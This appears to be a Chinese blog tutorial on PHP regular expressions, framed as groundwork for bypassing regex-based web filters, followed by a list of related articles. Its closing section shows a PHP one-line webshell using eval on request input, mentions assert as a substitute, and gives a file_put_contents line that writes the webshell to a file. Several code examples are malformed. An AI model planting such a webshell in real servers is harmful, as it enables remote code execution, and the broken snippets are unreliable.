后端基础 - 正则表达式

最新推荐文章于 2025-04-21 09:18:03 发布
最新推荐文章于 2025-04-21 09:18:03 发布
阅读量429 收藏 10
点赞数 7
分类专栏: php语言基础 文章标签: 正则表达式 web安全 安全 网络安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/remarkably/article/details/135669503
版权

一、什么是正则表达式

(核心是查找匹配,就是为了绕过现在主流的防御手段就是正则,正则匹配到危险的东西 替换或者拦截)

正则表达式,又称规则表达式。(英语:Regular Expression,在代码中常简写为regex、regexp或RE),计算机科学的一个概念。正则表达式通常被用来检索、替换那些符合某个模式(规则)的文本。

正则表达式的特点是:

  1. 灵活性、逻辑性和功能性非常强;

  2. 可以迅速地用极简单的方式达到字符串的复杂控制。

  3. 对于刚接触的人来说,比较晦涩难懂。

正则表达式用途:

判断字符串是否符合某一规则(判断是否符合手机号、邮箱规则)。

从一个字符串中找出符合规则的所有子字符串(取HTML标签名)。

二、PHP中正则表达式常用函数

PHP中使用正则规则一定要加代表正则的标识/ /

preg_match_all(正则表达式、匹配字符串、匹配到的东西放入数组)

返回匹配到的次数

preg_replace (正则表达式、替换成什么、匹配字符串)

返回替换后的结果

替换支持数组格式

<? Php
Var_dump(preg_match_all(‘/abc/’,’abcdswdd’));
?>
​
<? Php
Var_dump(preg_replace (‘/abc/’,’zkaq’,’abc666’));
?>
批量替换需要用数组:
<? Php
$a= array(‘abc’,’aabc’,’ccabc’);
Var_dump(preg_replace (‘/abc/’,’zkaq’,$a));
?>

三、正则表达式语法

常用转义字符:

数字:\d 非数字:\D 空白字符(空格、制表符、换页符等):\s 非空白字符:\S 单词字符(26个英文字母+数字+下划线_):\w 非单词字符:\W

<? Php
Var_dump(preg_replace (‘/\d/’,’zkaq’,’123123’));
?>
123123里所有的数字替换成zkaq
​
<? Php
Var_dump(preg_replace (‘/\s/’,’zkaq’,’123 123’));
?>
123 123所有空白字符都会被替换成zkaq
 自定义字符结合
字符集合:[单个字符或字符区间],用于匹配集合内字符如:
•  [a-z]表示a-z这26个小写字母
•  [0-9a-z]表示0-9这10个数字和a-z26个小写字母   只能到9了,成十上百的不能用函数,可以单个用,
•  [135a-h]表示包含数字1,3,5和字母a-h这8个字母
•  注意:两个不同字符段间请勿使用,隔开。
非集:[^单个字符或字符区间],用于匹配非集合内字符。如:
•  [^0-9]表示匹配所有非数字字符。
•  [^a-zA-Z]表示匹配所以非字母字符。
<? php
Var_dump(preg_replace (‘/[1-4]/’,’zkaq’,’123 123’));
?>
只有1到4之外的数字才能被替换
Var_dump(preg_replace (‘/154a-c/’,’zkaq’,’154,45,jhh’));
就能排除上百的了
**关键字**:
•  ()    => 和数学一样,代表这是一个整体。
•  ^    =>  匹配输入字符串的开始位置
•  $    => 匹配输入字符串的结尾位置
•  .     => 通配符[代表任意字符]
•  *    => 匹配0次或者多次
•  +     => 匹配1次或者多次
•  \    => 转义字符
•  |     =>  两项之间的一个选择。
Var_dump(preg_replace (‘/^3b$/’,’zkaq’,’3ddgb’));
**3开头b结尾以内的才会被匹配,3不开头不行,d不结尾不行**
Var_dump(preg_match_all (‘/a+/’,’zkaq’,’asddaaasda’))
**返回三次,a,aaa,a三次**
Var_dump(preg_match_all (‘/[a-c]|[0-5]’,’123b’,);
**返回四次**
**限定符 + 修饰符:**
•    限定符:
•    {n}   => 例如: 0{8}   意思是指 只有连起来8个0才会被匹配  
•    {n,}  =>例如: 0{2,}  意思是 只要有2个0及其以上的就会被匹配
•    {n,m}  => 例如: 0{2,4} 意思是最少匹配2个0,最多匹配4个0
•    注:被匹配时,默认匹配最多的次数
Var_dump(preg_match_all (‘/0{2}/’,’12005a’);
只有连在一起的两个0才能被匹配,如果有6个0在一起,会被匹配3次
Var_dump(preg_match_all (‘/0{2,}/’,’12005a’); 
2个0以上在一起的算一次
    修饰符:
•     /i  => 不区分大小写
•    /A  => 匹配规则必须从头开始匹配
•    /s   => .将匹配一切字符
•    /x   => 正则表达式中的空白字符会被忽略
•    /e   => 代码执行 仅限preg_replace()   => 可以写一句话但是不能连接菜刀
•    file_put_contents 函数 [把字符串写入文件] 
•    file_put_contents(写入文件的地址,写入的文件的内容)
Var_dump(preg_match_all (‘/abc/A’,’abc4’));
Var_dump(preg_match_all (‘/a bc/Ai’,’abc4’));
进阶:关于/e
一句话木马核心是任意代码上传
<?php
Eval($_REQUEST[‘a’]);      $_REQUEST是个数组  [‘a’]是指的是选中数组里a的键值
很多时候不只是eval,换成assert也能执行
echo preg_replace(‘/a/e’,’phpinfo()’,’abc’);可直接执行,但不能连接菜刀
解决办法:
Echo File_put_contents(‘8.php’,’<?php eval($_REQUEST[a]) ?>’)
就生成了8.php文件,里面有一句话木马

一起交流网安吧:safe2082

Java后端,正则匹配
【优快云】
07-06 398
想封装工具类的伙伴可以拿去用 ,文中matches()在如下地址有详细描述: 点击前往:Java matches() 方法 public static void main(String[] args) { /*String a = "12fga$"; String b = "2g"; System.out.println(a.contains(b)); //字符串长度 System.out.println(a.length()); //英文字母正则 String regex
Java基础--10--正则表达式
武天旭的博客
08-29 509
1、Java正则表达式 Java的正则表达式使用java.util.regex包,该包主要包括以下三个类: Pattern类: pattern对象是一个正则表达式的编译表示。Pattern类没有公共构造方法。要创建一个Pattern对象,必须首先调用其公共静态编译方法,它返回一个Pattern对象。该方法接受一个正则表达式作为它的第一个参数。 Matcher类: Matcher对象是对输入字符串进行解释和匹配操作的引擎。与Pattern类一样,Matcher也没有公共构造方法。你需要调用Pattern对
后端---正则表达式基础简介
Nagile-zhou博客
10-14 1609
正则表达式  正则表达式(Regular Expression)是一种文本模式,包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为"元字符")。 正则表达式使用单个字符串来描述、匹配一系列匹配某个句法规则的字符串。 正则表达式是繁琐的,但它是强大的,学会之后的应用会让你除了提高效率外,会给你带来绝对的成就感。只要认真阅读本教程,加上应用的时候进行一定的参考,掌握正则表达式不是问题。...
后端基础PHP——正则表达式
weixin_53026460的博客
06-07 397
1、
后端正则表达式&java正则学习笔记
qq_26127905的博客
11-30 1281
当然在Java中也可以通过处理字符串的方式达到检索,替换文本字符串的目的,但是有了正则表达式写代码更加简洁,通常两三行代码就可以达到目的,当然这也是建立在熟悉正则表达式基础之上的。在java中调用正则表达式的类是java.util.regex.Matcher和java.util.regex.Pattern,java.util.regex包是从jdk1.4开始提供的。学习正则表达式就是学习怎样定义一种“模式”的语法,说白了,就是学习各种匹配的规则,例如匹配数字要怎么写,匹配字符要怎么写等等。
java后端一些常用的正则表达式
qq_40974235的博客
07-02 812
1.手机号正则表达式 String regexp="^(((13[0-9]{1})|(15[0-9]{1})|(17[0-9]{1})|(18[0-9]{1}))+\d{8})$" 2.身份证正则表达式 String regexp="^([1-6][1-9]|50)\d{4}(18|19|20)\d{2}((0[1-9])|10|11|12)(([0-2][1-9])|10|20|30|31)\d{3}[0-9Xx]$" 3.准考证号12位纯数字正则表达式 String regexp="^\d{12}$
前端 -- 正则表达式匹配双引号常用例子:从入门到放弃!
最新发布
喵手的博客
04-21 931
哈喽,各位小伙伴们,你们好呀,我是喵手。运营社区:C站/掘金/腾讯云/阿里云/华为云/51CTO;欢迎大家常来逛逛
VBA语言的正则表达式
2501_90407307的博客
01-28 2266
正则表达式是一种用于描述字符串匹配规则的形式化语言。它用一个特定的语法表示字符串的结构与模式,可以准确判断字符串的内容是否符合预设的格式。例如,邮箱地址的常见格式可以用正则表达式来表示,这样可以有效地验证用户输入的邮箱是否有效。
C语言的正则表达式
2401_90032012的博客
01-03 1489
正则表达式(Regular Expression,通常简称为regex)是一串描述字符集合的特殊字符串,它具有强大的字符串匹配能力。字符:正则表达式中的普通字符表示它们本身,例如字符a匹配字符串a。元字符:一些特殊字符在正则表达式中具有特殊的含义,例如:匹配除换行符以外的任何单个字符匹配前面的子表达式零次或多次匹配前面的子表达式一次或多次?匹配前面的子表达式零次或一次匹配输入字符串的开始位置匹配输入字符串的结束位置regcomp():编译正则表达式。regexec():执行正则表达式匹配。
PHP语言的正则表达式
2501_90199532的博客
01-09 601
PHP语言中的正则表达式详解 引言 正则表达式(Regular Expression,简称Regex或RegExp)是一种用于模式匹配的强大工具,广泛运用于字符串的检索、替换和验证等操作。在编程语言中,PHP对正则表达式的支持非常强大,其包含了两种主要的正则表达式接口:基于POSIX的1种和基于Perl的1种。这使得PHP开发者可以方便地进行复杂的字符串处理。 本文将详细介绍PHP中正则表达式的基本用法、常见的函数、应用场景和一些技巧,帮助读者更深入地理解和利用PHP语言中的正则表达式。 一、正则表达式的基
java后端如何用正则表达式_Java 正则表达式详解
weixin_35000379的博客
03-02 1285
正则表达式一个正则表达式是一个用于文本搜索的文本模式。换句话说,在文本中搜索出现的模式。例如,你可以用正则表达式搜索网页中的邮箱地址或超链接。正则表达式示例下面是一个简单的Java正则表达式的例子,用于在文本中搜索 http://String text ="This is the text to be searched " +"for occurrences of the http:// p...
后台管理系统的常见正则
duanyuehuan
12-29 295
常见正则
java 后台 正则表达式_常用的正则表达式@java后台
weixin_42400518的博客
02-17 263
packageRegex;importjava.util.regex.Matcher;importjava.util.regex.Pattern;/*** @作者 Goofy* @邮件 252878950@qq.com* @日期 2014-1-25* @描述 常用的正则表达式*/public classRegexUtil {/*** 判断是否是正确的IP地址*@paramip*@returnboo...
java后台常用正则表达式
ShiHe_
08-08 4157
只能输入数字:"^[0-9]*$"。 只能输入n位的数字:"^\d{n}$"。 只能输入至少n位的数字:"^\d{n,}$"。 只能输入m~n位的数字:。"^\d{m,n}$" 只能输入零和非零开头的数字:"^(0|[1-9][0-9]*)$"。 只能输入有两位小数的正实数:"^[0-9]+(.[0-9]{2})?$"。 只能输入有1~3位小数的正实数:"^[0-9]+(.[0-9]{
java后台正则验证
四戒哥特
09-12 723
package com.fsti.icop.util.regexp; import java.util.regex.Matcher; import java.util.regex.Pattern; public final class RegExpValidatorUtils { /** * 验证邮箱 *  * @param 待验证的字符串 * @return 如果
正则常用后台验证
weixin_30678349的博客
09-07 152
验证用户为中文: String passUserNO = serialLog.getBillKey().trim(); Pattern chinaP = Pattern.compile("^[\u4e00-\u9fa5]+"); Matcher chinaM = chinaP.matcher(passUserNO); boolean chinaKey = c...
常用的正则表达式@java后台
weixin_42854483的博客
12-19 166
package Regex; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * @作者 Goofy * @邮件 252878950@qq.com * @日期 2014-1-25 * @描述 常用的正则表达式 */ public class RegexUtil { /** * ...
正则后台验证、抓包
softuse的博客
10-12 532
//正则后台验证 protected void btnReg_Click(object sender, EventArgs e) {     string strQQ=txtQQ.Text.Trim();     string strTel=txtTel.Text.Trim();     if(!Regex.IsMatch(strQQ,@"^[1-9]\d{4,10}$"))
【Javaweb】后台的字符串转义,入库之前记得先对字符串转义防止sql注入问题
编程记录,亲测有效
03-28 3522
在《【JavaScript】某些字符不转义可以导致网页崩溃与涉及转义字符的显示方法》(点击打开链接)提及到一种表单之前,必须把表单的输入框的内容转义的方法,但是,其实这种字符串的转义更加应该放在后台中进行。这样同时能够有效地防止sql注入的问题。 所谓的sql注入是什么呢?比如,你做了一个登录功能什么的。你必须把根据用户输入的用户名,查询存放在数据库的密码的,然后与密码比对是不是? selec
简化JavaScript正则表达式的封装工具
JavaScript作为一门前端和后端开发中常用的编程语言,内置了对正则表达式的支持。 封装regexp的目的是为了简化正则表达式的使用过程,提高代码的可读性和可维护性,减少开发者的重复工作。下面将详细介绍与“regexp...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值